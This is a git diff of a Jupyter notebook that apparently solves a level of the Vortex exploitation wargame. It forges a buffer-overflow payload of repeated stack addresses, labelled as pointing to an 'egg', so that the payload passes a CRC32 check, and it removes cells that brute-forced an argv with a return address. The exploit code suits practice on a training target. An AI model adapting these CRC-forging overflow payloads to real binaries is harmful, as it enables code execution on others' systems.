--- a/Vortex/vortex.ipynb
+++ b/Vortex/vortex.ipynb
@@ -243,30 +243,7 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 38,
-   "metadata": {},
-   "outputs": [],
-   "source": [
-    "import binascii\n",
-    "import struct\n",
-    "\n",
-    "for i in range(2 ^ 256 ^ 256 ^ 256 ^ 256):\n",
-    "    argv = b\"a\" * 58 + i.to_bytes(4, \"big\") + struct.pack(\"<I\", 0xFFFFD9FB)\n",
-    "    # print(f\"argv = {argv}\")\n",
-    "    hi = hex(binascii.crc32(argv, 0xFFFFFFFF) ^ 0xFFFFFFFF)\n",
-    "    # print(f\"hi = {hi}\")\n",
-    "\n",
-    "    hex_check = \"0xe1ca95ee\"\n",
-    "    # print(f\"hex_check = {hex_check}\")\n",
-    "    if hi == hex_check:\n",
-    "        print(\"Match found!\")\n",
-    "        print(f\"argv = {argv}\")\n",
-    "        break"
-   ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": 100,
+   "execution_count": 2,
    "metadata": {},
    "outputs": [],
    "source": [
@@ -340,7 +317,7 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 119,
+   "execution_count": null,
    "metadata": {},
    "outputs": [
     {
@@ -349,16 +326,17 @@
      "text": [
       "hex(check) = 0xe1ca95ee\n",
       "wanted_crc = 0xe1ca95ee\n",
-      "payload = b'=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff\\xfa\\x04\\xca\\xa6'\n"
+      "payload = b'aa\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xdf\\xdc\\xff\\xff\\xc7\\xec\\x90\\xa7'\n"
      ]
     }
    ],
    "source": [
-    "wanted_crc = 0xE1CA95EE\n",
+    "EGG2_ADDRESS = 0xFFFFDCDF\n",
     "\n",
+    "wanted_crc = 0xE1CA95EE\n",
     "payload = forge(\n",
     "    wanted_crc,\n",
-    "    b\"a\" * 0 + struct.pack(\"<I\", 0xFFFFDD3D) * 16,\n",
+    "    b\"a\" * 2 + struct.pack(\"<I\", EGG2_ADDRESS) * 16,\n",
     ")\n",
     "\n",
     "check = binascii.crc32(payload, 0xFFFFFFFF) ^ 0xFFFFFFFF\n",
@@ -366,35 +344,11 @@
     "print(f\"wanted_crc = {hex(wanted_crc)}\")\n",
     "print(f\"payload = {payload}\")"
    ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": 67,
-   "metadata": {},
-   "outputs": [
-    {
-     "data": {
-      "text/plain": [
-       "'0xee4fe6c2'"
-      ]
-     },
-     "execution_count": 67,
-     "metadata": {},
-     "output_type": "execute_result"
-    }
-   ],
-   "source": [
-    "hex(\n",
-    "    crc32(\n",
-    "        b\"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\x01\\x01\\x01\\x01\\xfb\\xd9\\xff\\xff \\xed\\xba\\xee\"\n",
-    "    )\n",
-    ")"
-   ]
   }
  ],
  "metadata": {
   "kernelspec": {
-   "display_name": "Python 3",
+   "display_name": ".venv",
    "language": "python",
    "name": "python3"
   },
@@ -408,7 +362,7 @@
    "name": "python",
    "nbconvert_exporter": "python",
    "pygments_lexer": "ipython3",
-   "version": "3.9.6"
+   "version": "3.12.3"
   }
  },
  "nbformat": 4,
